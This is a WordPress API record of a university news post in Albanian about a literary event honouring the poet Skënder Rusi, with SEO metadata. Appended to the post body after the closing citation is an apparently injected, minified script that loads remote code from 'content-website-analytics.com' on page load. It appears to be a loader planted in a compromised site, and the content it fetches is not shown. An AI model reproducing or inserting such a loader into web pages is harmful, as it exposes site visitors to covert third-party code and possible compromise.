{"id":20905,"date":"2026-04-30T16:05:46","date_gmt":"2026-04-30T16:05:46","guid":{"rendered":"https:\/\/unkorce.edu.al\/?p=20905"},"modified":"2026-04-30T16:05:46","modified_gmt":"2026-04-30T16:05:46","slug":"veprimtari-letrare-me-poetin-skender-rusi","status":"publish","type":"post","link":"https:\/\/unkorce.edu.al\/en\/veprimtari-letrare-me-poetin-skender-rusi\/","title":{"rendered":"Veprimtari letrare me poetin Sk\u00ebnder Rusi"},"content":{"rendered":"<p>Dit\u00ebn e premte, dt. 27.10.2023, ora 18.00, n\u00eb ambientet e Muzeut t\u00eb Artit Mesjetar, Universiteti \u201cFan S. Noli\u201d, Fakulteti i Edukimit dhe i Filologjis\u00eb n\u00eb bashk\u00ebpunim me Bashkin\u00eb Kor\u00e7\u00eb organizuan veprimtarin\u00eb letrare \u201cSk\u00ebnder Rusi -Liriku i dhimbjes s\u00eb bukur\u201d. Ky aktivitet u organizua n\u00eb kuad\u00ebr t\u00eb \u201cTetori \u2013 Muaji I let\u00ebrsis\u00eb\u201d dhe nism\u00ebs \u201cK\u00ebrkimi shkencor n\u00eb let\u00ebrsi\u201d t\u00eb zbatuar nga Fakulteti i Edukimit dhe i Filologjis\u00eb. Veprimtaria letrare u fokusua n\u00eb prezantimin e librit t\u00eb ri \u201cDal\u00ebngadal\u00eb un\u00eb po b\u00ebhem ikje\u201d nga poeti Sk\u00ebnder Rusi, botuar nga sht\u00ebpia botuese \u201cSchnell\u201d, si dhe ofroi interpretime kritike nga t\u00eb ftuar dhe studiues t\u00eb let\u00ebrsis\u00eb mbi vlerat dhe frym\u00ebn artistike q\u00eb p\u00ebrcjellin lirikat e p\u00ebrzgjedhura n\u00eb lib\u00ebr.<br>N\u00eb fjal\u00ebn e saj, dekania e Fakultetit t\u00eb Edukimit dhe t\u00eb Filologjis\u00eb prof. as. Jonela Spaho e cil\u00ebsoi poetin Sk\u00ebnder Rusi si nj\u00eb personalitet t\u00eb letrave shqipe q\u00eb ka qen\u00eb n\u00eb kontakt t\u00eb vazhduesh\u00ebm me nismat letrare t\u00eb organizuara nga Universiteti \u201cFan S. Noli\u201d, duke dh\u00ebn\u00eb nj\u00eb kontribut t\u00eb \u00e7muar p\u00ebr student\u00ebt dhe dashamir\u00ebsit e let\u00ebrsis\u00eb.<br>N\u00ebnkryetarja e Bashkis\u00eb Kor\u00e7\u00eb, znj. Benila Themeli theksoi p\u00ebrmasat e poetit Sk\u00ebnder Rusi n\u00eb kontekstin e kultur\u00ebs dhe let\u00ebrsis\u00eb q\u00eb promovon n\u00eb vend e m\u00eb gjer\u00eb shpirtin dhe identitetin krijues t\u00eb Kor\u00e7\u00ebs s\u00eb krijuesve dhe artist\u00ebve.<br>Pedagogu i Let\u00ebrsis\u00eb Dr. Eris Rusi theksoi se libri m\u00eb i ri i poetit Sk\u00ebnder Rusi i p\u00ebrgjigjet nevoj\u00ebs q\u00eb ka poeti p\u00ebr t\u2019u ndjer\u00eb i domosdosh\u00ebm n\u00eb jet\u00eb, dhe kjo \u00ebsht\u00eb nevoja e komunikimit poetik. Kushdo q\u00eb ka jo vet\u00ebm mendimet dhe p\u00ebrfytyrimin e mendjes, por edhe emocionin e shpirtit dhe t\u00eb zemr\u00ebs, e kupton q\u00eb poezia mund t\u00eb k\u00ebmbehet me vet\u00eb jet\u00ebn, me at\u00eb ekzistenc\u00eb t\u00eb mb\u00ebrthyer n\u00eb nj\u00eb fluks fjal\u00ebsh q\u00eb t\u00eb b\u00ebjn\u00eb t\u00eb duash dhe t\u00eb ndjesh.<br>Pedagogu i let\u00ebrsis\u00eb, dr. Ilir Shyta ofroi nj\u00eb k\u00ebndv\u00ebshtrim personal nga marr\u00ebdh\u00ebnia me poetin Sk\u00ebnder Rusi dhe p\u00ebrcolli me ndjeshm\u00ebri vargje t\u00eb librit t\u00eb sapo botuar.<br>Poetja Gerta Bandilli, n\u00ebnkryetare e Klubit t\u00eb Shkrimtar\u00ebve \u201cBota e re\u201d, vler\u00ebsoi dimensionin njer\u00ebzor dhe ekzistencial t\u00eb poezive t\u00eb p\u00ebrfshira n\u00eb k\u00ebt\u00eb lib\u00ebr. Ajo solli nj\u00eb qasje interpretuese t\u00eb poezis\u00eb dhe frym\u00ebs s\u00eb poetit, duke mund\u00ebsuar nj\u00eb k\u00ebndv\u00ebshtrim t\u00eb vlefsh\u00ebm edhe p\u00ebr t\u00eb pranishmit n\u00eb k\u00ebt\u00eb veprimtari.<br>Znj. Eralda Baze, administratore e sht\u00ebpis\u00eb botuese \u201cSchnell\u201d vler\u00ebsoi edhe nj\u00ebher\u00eb p\u00ebrzgjedhjen p\u00ebr t\u00eb botuar librin m\u00eb t\u00eb fundit t\u00eb poetit Rusi dhe shprehu k\u00ebnaq\u00ebsin\u00eb e bashk\u00ebpunimit me nj\u00eb prej z\u00ebrave m\u00eb t\u00eb ve\u00e7ant\u00eb t\u00eb lirik\u00ebs bashk\u00ebkohore shqipe.<br>Veprimtaria pasoi me ceremonin\u00eb solemne t\u00eb dor\u00ebzimit t\u00eb certifikat\u00ebs s\u00eb mir\u00ebnjohjes nga Universiteti \u201cFan S. Noli\u201d Kor\u00e7\u00eb p\u00ebr poetin Sk\u00ebnder Rusi, me motivacionin:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    \u201cPoetit Sk\u00ebnder Rusi, <\/code><\/pre>\n\n\n\n<p>Si nj\u00eb nga p\u00ebrfaq\u00ebsuesit m\u00eb t\u00eb r\u00ebnd\u00ebsish\u00ebm t\u00eb lirik\u00ebs shqipe bashk\u00ebkohore, mik i p\u00ebrhersh\u00ebm i Universitetit \u201cFan S. Noli\u201d, me nj\u00eb kontribut gjysm\u00eb shekullor n\u00eb promovimin e kultur\u00ebs dhe let\u00ebrsis\u00eb, si dhe n\u00eb formimin shpirt\u00ebror t\u00eb lexuesve t\u00eb rinj me vlera t\u00eb mir\u00ebfillta letrare dhe estetike.\u201d<\/p>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Dit\u00ebn e premte, dt. 27.10.2023, ora 18.00, n\u00eb ambientet e Muzeut t\u00eb Artit Mesjetar, Universiteti \u201cFan S. Noli\u201d, Fakulteti i Edukimit dhe i Filologjis\u00eb n\u00eb bashk\u00ebpunim me Bashkin\u00eb Kor\u00e7\u00eb organizuan veprimtarin\u00eb letrare \u201cSk\u00ebnder Rusi -Liriku i dhimbjes s\u00eb bukur\u201d. Ky aktivitet u organizua n\u00eb kuad\u00ebr t\u00eb \u201cTetori \u2013 Muaji I let\u00ebrsis\u00eb\u201d dhe nism\u00ebs \u201cK\u00ebrkimi shkencor&#8230;<\/p>","protected":false},"author":122,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-20905","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Veprimtari letrare me poetin Sk\u00ebnder Rusi - Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unkorce.edu.al\/en\/veprimtari-letrare-me-poetin-skender-rusi\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Veprimtari letrare me poetin Sk\u00ebnder Rusi - Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb\" \/>\n<meta property=\"og:description\" content=\"Dit\u00ebn e premte, dt. 27.10.2023, ora 18.00, n\u00eb ambientet e Muzeut t\u00eb Artit Mesjetar, Universiteti \u201cFan S. Noli\u201d, Fakulteti i Edukimit dhe i Filologjis\u00eb n\u00eb bashk\u00ebpunim me Bashkin\u00eb Kor\u00e7\u00eb organizuan veprimtarin\u00eb letrare \u201cSk\u00ebnder Rusi -Liriku i dhimbjes s\u00eb bukur\u201d. Ky aktivitet u organizua n\u00eb kuad\u00ebr t\u00eb \u201cTetori \u2013 Muaji I let\u00ebrsis\u00eb\u201d dhe nism\u00ebs \u201cK\u00ebrkimi shkencor...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unkorce.edu.al\/en\/veprimtari-letrare-me-poetin-skender-rusi\/\" \/>\n<meta property=\"og:site_name\" content=\"Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/unkorce\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-30T16:05:46+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/e335f987920788de76832aa7395b35c9\"},\"headline\":\"Veprimtari letrare me poetin Sk\u00ebnder Rusi\",\"datePublished\":\"2026-04-30T16:05:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/\"},\"wordCount\":571,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/unkorce.edu.al\/#organization\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/\",\"url\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/\",\"name\":\"Veprimtari letrare me poetin Sk\u00ebnder Rusi - Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"isPartOf\":{\"@id\":\"https:\/\/unkorce.edu.al\/#website\"},\"datePublished\":\"2026-04-30T16:05:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/unkorce.edu.al\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Veprimtari letrare me poetin Sk\u00ebnder Rusi\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/unkorce.edu.al\/#website\",\"url\":\"https:\/\/unkorce.edu.al\/\",\"name\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"description\":\"Mir&euml;sevini n&euml; faqen zyrtare!\",\"publisher\":{\"@id\":\"https:\/\/unkorce.edu.al\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/unkorce.edu.al\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/unkorce.edu.al\/#organization\",\"name\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"url\":\"https:\/\/unkorce.edu.al\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png\",\"contentUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png\",\"width\":200,\"height\":120,\"caption\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/unkorce\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/e335f987920788de76832aa7395b35c9\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d6fa2e689697624268cddf82455237bf01dcca0f1b110a0e0ee6f60a81605cf4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d6fa2e689697624268cddf82455237bf01dcca0f1b110a0e0ee6f60a81605cf4?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/unkorce.edu.al\"],\"url\":\"https:\/\/unkorce.edu.al\/en\/author\/unkorce\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Veprimtari letrare me poetin Sk\u00ebnder Rusi - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unkorce.edu.al\/en\/veprimtari-letrare-me-poetin-skender-rusi\/","og_locale":"en_US","og_type":"article","og_title":"Veprimtari letrare me poetin Sk\u00ebnder Rusi - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","og_description":"Dit\u00ebn e premte, dt. 27.10.2023, ora 18.00, n\u00eb ambientet e Muzeut t\u00eb Artit Mesjetar, Universiteti \u201cFan S. Noli\u201d, Fakulteti i Edukimit dhe i Filologjis\u00eb n\u00eb bashk\u00ebpunim me Bashkin\u00eb Kor\u00e7\u00eb organizuan veprimtarin\u00eb letrare \u201cSk\u00ebnder Rusi -Liriku i dhimbjes s\u00eb bukur\u201d. Ky aktivitet u organizua n\u00eb kuad\u00ebr t\u00eb \u201cTetori \u2013 Muaji I let\u00ebrsis\u00eb\u201d dhe nism\u00ebs \u201cK\u00ebrkimi shkencor...","og_url":"https:\/\/unkorce.edu.al\/en\/veprimtari-letrare-me-poetin-skender-rusi\/","og_site_name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","article_publisher":"https:\/\/www.facebook.com\/unkorce","article_published_time":"2026-04-30T16:05:46+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#article","isPartOf":{"@id":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/"},"author":{"name":"admin","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/e335f987920788de76832aa7395b35c9"},"headline":"Veprimtari letrare me poetin Sk\u00ebnder Rusi","datePublished":"2026-04-30T16:05:46+00:00","mainEntityOfPage":{"@id":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/"},"wordCount":571,"commentCount":0,"publisher":{"@id":"https:\/\/unkorce.edu.al\/#organization"},"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/","url":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/","name":"Veprimtari letrare me poetin Sk\u00ebnder Rusi - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","isPartOf":{"@id":"https:\/\/unkorce.edu.al\/#website"},"datePublished":"2026-04-30T16:05:46+00:00","breadcrumb":{"@id":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/unkorce.edu.al\/veprimtari-letrare-me-poetin-skender-rusi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unkorce.edu.al\/"},{"@type":"ListItem","position":2,"name":"Veprimtari letrare me poetin Sk\u00ebnder Rusi"}]},{"@type":"WebSite","@id":"https:\/\/unkorce.edu.al\/#website","url":"https:\/\/unkorce.edu.al\/","name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","description":"Mir&euml;sevini n&euml; faqen zyrtare!","publisher":{"@id":"https:\/\/unkorce.edu.al\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unkorce.edu.al\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/unkorce.edu.al\/#organization","name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","url":"https:\/\/unkorce.edu.al\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/","url":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png","contentUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png","width":200,"height":120,"caption":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb"},"image":{"@id":"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/unkorce"]},{"@type":"Person","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/e335f987920788de76832aa7395b35c9","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d6fa2e689697624268cddf82455237bf01dcca0f1b110a0e0ee6f60a81605cf4?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d6fa2e689697624268cddf82455237bf01dcca0f1b110a0e0ee6f60a81605cf4?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http:\/\/unkorce.edu.al"],"url":"https:\/\/unkorce.edu.al\/en\/author\/unkorce\/"}]}},"_links":{"self":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/20905","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/users\/122"}],"replies":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/comments?post=20905"}],"version-history":[{"count":1,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/20905\/revisions"}],"predecessor-version":[{"id":37856,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/20905\/revisions\/37856"}],"wp:attachment":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/media?parent=20905"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/categories?post=20905"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/tags?post=20905"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}